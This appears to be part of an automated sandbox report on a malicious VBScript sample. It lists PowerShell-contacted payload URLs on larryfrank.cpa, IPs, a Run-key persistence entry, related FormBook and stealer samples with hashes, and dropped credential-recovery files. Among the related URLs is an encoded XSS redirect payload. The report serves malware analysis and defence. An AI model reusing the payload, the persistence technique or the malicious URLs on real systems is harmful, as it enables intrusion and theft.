            https://larryfrank.cpa/Negus85.csvXRpowershell.exe, 00000010.00000002.1836403995.00000000048E8000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://larryfrank.cpa/Negupowershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://larryfrank.cpa/Negus85.cpowershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.1836403995.00000000048E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1833904027.0000000002B62000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://larryfrank.cpa/Negus85powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://crl.microshpowershell.exe, 0000000C.00000002.2097671228.000001A8DDA95000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://larryfrank.cpa/Negus8powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://larryfrank.cppowershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://larryfrank.cpa/Negpowershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://larryfrank.cpa/Negus85.cspowershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://larryfrank.cpa/Npowershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.2072484963.000001A8D5541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://larryfrank.cpa/Neguspowershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://aka.ms/pscore68powershell.exe, 0000000C.00000002.1958825500.000001A8C54D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://larryfrank.cpa/powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://larryfrank.cpa/Nepowershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.1958825500.000001A8C54D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            46.23.69.44
            alignedinvestment.comUnited Kingdom
            13213UK2NET-ASGBtrue
            178.128.157.150
            larryfrank.cpaNetherlands
            14061DIGITALOCEAN-ASNUSfalse
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1466597
            Start date and time:2024-07-03 07:49:06 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 9m 52s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:32
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:birectangular.vbs
            Detection:MAL
            Classification:mal100.troj.spyw.expl.evad.winVBS@539/14@3/2
            EGA Information:
            • Successful, ratio: 60%
            HCA Information:
            • Successful, ratio: 98%
            • Number of executed functions: 86
            • Number of non-executed functions: 276
            Cookbook Comments:
            • Found application associated with file extension: .vbs
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 93.184.221.240
            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, time.windows.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target powershell.exe, PID 7428 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 7748 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtEnumerateKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            TimeTypeDescription
            01:49:59API Interceptor1x Sleep call for process: wscript.exe modified
            01:50:18API Interceptor133x Sleep call for process: powershell.exe modified
            03:50:00API Interceptor538x Sleep call for process: explorer.exe modified
            03:50:44API Interceptor18x Sleep call for process: raserver.exe modified
            09:50:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run KFRL5VBPUBT C:\Program Files (x86)\windows mail\wab.exe
            09:50:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run KFRL5VBPUBT C:\Program Files (x86)\windows mail\wab.exe
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            46.23.69.44Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • www.looealpacas.com/ntpp/
            Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • www.looealpacas.com/ntpp/
            JUSTIFICANTE DE PAGO 18903547820000.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • www.looealpacas.com/ntpp/
            ZgDPnNtvhR.exeGet hashmaliciousFormBook, zgRATBrowse
            • www.africa-connective.com/sziq/?YV=PpyuDi2vDhDjQ57TkACcnXno456rzHq9gSp/yxSONEhnftrtNn0HgqcP7ws47jIVlXmPoSTTP5YKO8/yVRAt+pzRWBbBfM8Fug==&pV1L=w6j86j4p8ZOxP
            Reverse_Invoice.exeGet hashmaliciousFormBookBrowse
            • www.africa-connective.com/udwf/?mjp4bHS=Psb5yQ7igJo9+4/ioDbNTzeLKFPo0g0bKamXqi92klql4hbTHBFSP0KFwnU2a4f/Cs+13ovmsF47ixHeoQPqiDeRgzlHCMLMxA==&FBODO=UPF05xoPwpatlVFp
            e-dekont_html.exeGet hashmaliciousFormBookBrowse
            • www.africa-connective.com/sziq/?1vfHSTkH=PpyuDi2vDhDjQ57S4QDx1wy21cS/6g29gSp/yxSONEhnftrtNn0HgqcP7ws47jIVlXmPoSTTP5YKO8/yVRAt7ryRSBbActoFug==&pZ88=5vjh
            DECART.exeGet hashmaliciousFormBookBrowse
            • www.africa-connective.com/sziq/?SbsdD2Nx=PpyuDi2vDhDjQ57S4QDx1wy21cS/6g29gSp/yxSONEhnftrtNn0HgqcP7ws47jIVlXmPoSTTP5YKO8/yVRAt7ryRSBbActoFug==&OhB=HBs0
            130_xlsx.exeGet hashmaliciousFormBookBrowse
            • www.africa-connective.com/sziq/?VrCP=PpyuDi2vDhDjQ57TkACcnXno456rzHq9gSp/yxSONEhnftrtNn0HgqcP7ws47jIVlXmPoSTTP5YKO8/yVRAt+pzRWBbBfM8Fug==&7r=KTBDzDT0Nn-lQZuP
            vDXkQEbxeQ.exeGet hashmaliciousFormBookBrowse
            • www.clm-grp.online/oqhk/?kDEhipYx=I2qhnXYsgBqXshaINHxJP87IlvR2BXXcj7m+znlPv080EUwcgLnLMY334q74ibBKGeRVkbp4gB9GCmaRXNkWz84XwPqZJdkRnQ==&M01x=UlydgdiP
            PO_4501283529.xlsGet hashmaliciousFormBookBrowse
            • www.clm-grp.online/oqhk/?L44pe6=I2qhnXYsgBqXshaXR2BZPL/HvKwTXkPcj7m+znlPv080EUwcgLnLbNT74/H7jdtKGuQr/vFxkDJKJmLkUuJ2x9gF0O6nIPVTo15UyuI=&_le4=rzhdyZOp9Ljl
            178.128.157.150102-XXXX.htmGet hashmaliciousUnknownBrowse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              larryfrank.cpa102-XXXX.htmGet hashmaliciousUnknownBrowse
              • 178.128.157.150
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              UK2NET-ASGBrPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
              • 109.123.121.243
              1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
              • 109.123.121.243
              Invoice_Payment.exeGet hashmaliciousFormBookBrowse
              • 109.123.121.243
              gllYLLq5op.elfGet hashmaliciousMiraiBrowse
              • 77.92.65.94
              PIG860624BF1GE1532.xml.exeGet hashmaliciousFormBookBrowse
              • 109.123.121.243
              DPqKF5vqpe.exeGet hashmaliciousLummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBCBrowse
              • 46.23.69.44
              T57QiayIem.elfGet hashmaliciousUnknownBrowse
              • 77.92.78.176
              Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 46.23.69.44
              Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 46.23.69.44
              JUSTIFICANTE DE PAGO 18903547820000.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 46.23.69.44
              DIGITALOCEAN-ASNUShttp://review-page-violation-issue-meta-center.vercel.app/Get hashmaliciousUnknownBrowse
              • 138.197.235.123
              https://request-remove-violation-here.surge.sh/next.htmlGet hashmaliciousUnknownBrowse
              • 138.68.112.220
              https://iwahadxi.hosted.phplist.com/lists/lt.php/?tid=eU1SAFEEUlZTABhUAVAGGAZWVFsfXVQLWkkDBQIAUAwCAgcAAldPWwdaBlNRVAgYVwEEXh9QClxcSQcAUlcbWgQGAAJVVwRXBAoBSQcBAVALVA8LHwIEXVtJUg8GVxsAVVMHGA5SB1EBC1YDAQQBDAGet hashmaliciousUnknownBrowse
              • 45.55.112.74
              http://multichaindappsx.pages.dev/Get hashmaliciousUnknownBrowse
              • 142.93.100.104
              http://texadasoftware.comGet hashmaliciousUnknownBrowse
              • 159.89.102.253
              https://y-accesoonlinedel-wizinik-anabelgonzalesferran498785.codeanyapp.com/wizin/es/login.phpGet hashmaliciousUnknownBrowse
              • 45.55.112.74
              https://www.cleaner.com/search/results?q=u5siq362e14p5%22%3E%3Cimg%20src%3D%22image.jpg%22%20onerror%3D%22var%20url1%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%20var%20url2%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%0D%0Avar%20url%20%3D%20%5B%27ht%27%2C%27tps%27%2C%27%3A%2F%27%2C%27%2Fw%27%2C%27ww.w%27%2C%27e%27%2C%27bw%27%2C%27at%27%2C%27chero%27%2C%27n%27%2C%27li%27%2C%27n%27%2C%27e.xy%27%2C%27z%2F2%27%2C%275P%27%2C%27B%27%2C%27NZ%27%2C%279%27%2C%279%2F7%27%2C%27B%27%2C%27R7%27%2C%2751%27%2C%27WZ%27%2C%27%2F%3Fsub1%3D15%26sub2%3D315-14024%26sub3%3D1267-284403-23819%27%5D.join%28%27%27%29%3B%0D%0A%20url%20%3D%20url.replace%28%2F%2C%2Fg%2C%20%27%27%29%3B%20var%20win%20%3D%20window.open%28url%2C%20%27_self%27%29%3B%20win.opener%20%3D%20null%3B%20win.location.replace%28url%29%3B%22%3E#I7JG1iFsTIxyHvBurVdKGet hashmaliciousUnknownBrowse
              • 178.128.158.147
              winrar-64-6.21-installer_AmGAP-1.exeGet hashmaliciousPureLog StealerBrowse
              • 165.227.251.217
              https://indd.adobe.com/view/2bab4c20-5db8-4df4-abb1-5e8820aa4ec8Get hashmaliciousUnknownBrowse
              • 64.225.25.112
              https://stef.start.page/Get hashmaliciousUnknownBrowse
              • 167.71.46.236
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              3b5074b1b5d032e5620f69f9f700ff0eAWB#276097479258.pdf.htmlGet hashmaliciousUnknownBrowse
              • 178.128.157.150
              payment.exeGet hashmaliciousSnake KeyloggerBrowse
              • 178.128.157.150
              Doc_CI_PL_HBL_COO_Insu_.exeGet hashmaliciousAgentTeslaBrowse
              • 178.128.157.150
              roger.exeGet hashmaliciousAgentTeslaBrowse
              • 178.128.157.150
              https://rules-pear-kft5d2.mystrikingly.com/Get hashmaliciousUnknownBrowse
              • 178.128.157.150
              https://steaemcoonmmunnltly.com/g-friend/golo/gifts-50Get hashmaliciousUnknownBrowse
              • 178.128.157.150
              https://pub-9445ce0d74714d1c934c51ffcf83c3f2.r2.dev/slnt.html?nycsbsGet hashmaliciousHTMLPhisherBrowse
              • 178.128.157.150
              http://www.telegramkv.com/Get hashmaliciousUnknownBrowse
              • 178.128.157.150
              SecuriteInfo.com.Adware.DownwareNET.4.16171.10714.exeGet hashmaliciousUnknownBrowse
              • 178.128.157.150
              https://iwahadxi.hosted.phplist.com/lists/lt.php/?tid=eU1SAFEEUlZTABhUAVAGGAZWVFsfXVQLWkkDBQIAUAwCAgcAAldPWwdaBlNRVAgYVwEEXh9QClxcSQcAUlcbWgQGAAJVVwRXBAoBSQcBAVALVA8LHwIEXVtJUg8GVxsAVVMHGA5SB1EBC1YDAQQBDAGet hashmaliciousUnknownBrowse
              • 178.128.157.150
              37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.Adware.DownwareNET.4.16171.10714.exeGet hashmaliciousUnknownBrowse
              • 178.128.157.150
              SecuriteInfo.com.Adware.DownwareNET.4.16171.10714.exeGet hashmaliciousUnknownBrowse
              • 178.128.157.150
              file.exeGet hashmaliciousVidarBrowse
              • 178.128.157.150
              FmQx1Fw3VA.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
              • 178.128.157.150
              config.lnk.mal.lnkGet hashmaliciousCredGrabber, Meduza StealerBrowse
              • 178.128.157.150
              invoicepast.pdf.lnk.mal.lnkGet hashmaliciousScreenConnect ToolBrowse
              • 178.128.157.150
              Invoice-UPS-218931.pdf.lnk.mal.lnkGet hashmaliciousUnknownBrowse
              • 178.128.157.150
              IF10339.pdf.lnk.mal.lnkGet hashmaliciousUnknownBrowse
              • 178.128.157.150
              Video%20HD%20%281080p%29.lnk.mal.lnkGet hashmaliciousUnknownBrowse
              • 178.128.157.150
              file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
              • 178.128.157.150
              No context
              Process:C:\Windows\System32\wscript.exe
              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
              Category:dropped
              Size (bytes):71954
              Entropy (8bit):7.996617769952133
              Encrypted:true
              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
              Malicious:false
              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
              Process:C:\Windows\System32\wscript.exe
              File Type:data
              Category:dropped
              Size (bytes):328
              Entropy (8bit):3.144086598890895
              Encrypted:false
              SSDEEP:6:kKJ9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:ADnLNkPlE99SNxAhUe/3
              MD5:94D8E90009E1B3325A72F7FB0DB1AF5E
              SHA1:2344B84695C225FBFC79010BD2263EFFC5A9A638
              SHA-256:43404AA48B23C6B383B951B61AB79FB4E1E491282829257F526566F60773F896
              SHA-512:B81DFE0DF42533D8AD1CC7BCCA1ED112D0ABD49EE3904DB7FDB0D8D4BAC8CB0229E72B935B5C4D1818C48D3BB6134FCD269DC68214409BB21C0B756FCF48F39F
              Malicious:false
              Preview:p...... ...............(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:modified
              Size (bytes):11608
              Entropy (8bit):4.8908305915084105
              Encrypted:false
              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
              MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
              SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
              SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
              SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
              Malicious:false
              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):64
              Entropy (8bit):1.1940658735648508
              Encrypted:false
              SSDEEP:3:Nlllulbnolz:NllUc
              MD5:F23953D4A58E404FCB67ADD0C45EB27A
              SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
              SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
              SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
              Malicious:false
              Preview:@...e................................................@..........
              Process:C:\Windows\SysWOW64\cmd.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
              Category:modified
              Size (bytes):40960
              Entropy (8bit):0.8553638852307782
              Encrypted:false
              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
              MD5:28222628A3465C5F0D4B28F70F97F482
              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
              Malicious:false
              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\SysWOW64\raserver.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
              Category:dropped
              Size (bytes):81295
              Entropy (8bit):7.81968299607839
              Encrypted:false
              SSDEEP:1536:CQVuq2NwPkab+y+Vh2dOVX37wduYQDR/VkIIII28zMZwOOyw2:nVkNwPtCn/yOVHsgYQ8IIIIxUcyw2
              MD5:64AAFA7009AB6FD8B9DB2BA55E6712CE
              SHA1:864434249E859F408FBC6A1B51F5AD96D20DC008
              SHA-256:C18920E87315EB0CC1BFE8F0170263FE5848FC696459A468FEBD38F83822EE28
              SHA-512:5686D6CD94D9C83F9D9060236AFC18E0B682572CE93D56E66C31F80928276B3B64D5CF33C23B882D3AA07EBA5E5D7E2DC27EAD293978D356D16224850BEB2C94
              Malicious:false
              Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(....~....[.....).....+.F"8x{I.t.p....pj.g.Ez..+..........O.Wz.......\..4;?...O.........QA..Z.DqCr.Y...L....V..\A.
              Process:C:\Windows\SysWOW64\raserver.exe
              File Type:Targa image data - RGB - RLE 109 x 101 x 32 +114 +111 "R"
              Category:dropped
              Size (bytes):38
              Entropy (8bit):2.7883088224543333
              Encrypted:false
              SSDEEP:3:rFGQJhIl:RGQPY
              MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
              SHA1:1E332822167C6F351B99615EADA2C30A538FF037
              SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
              SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
              Malicious:false
              Preview:....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
              Process:C:\Windows\SysWOW64\raserver.exe
              File Type:data
              Category:dropped
              Size (bytes):40
              Entropy (8bit):2.8420918598895937
              Encrypted:false
              SSDEEP:3:+slXllAGQJhIl:dlIGQPY
              MD5:D63A82E5D81E02E399090AF26DB0B9CB
              SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
              SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
              SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
              Malicious:true
              Preview:....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
              Process:C:\Windows\SysWOW64\raserver.exe
              File Type:data
              Category:dropped
              Size (bytes):40
              Entropy (8bit):2.96096404744368
              Encrypted:false
              SSDEEP:3:AJlbeGQJhIl:tGQPY
              MD5:BA3B6BC807D4F76794C4B81B09BB9BA5
              SHA1:24CB89501F0212FF3095ECC0ABA97DD563718FB1
              SHA-256:6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
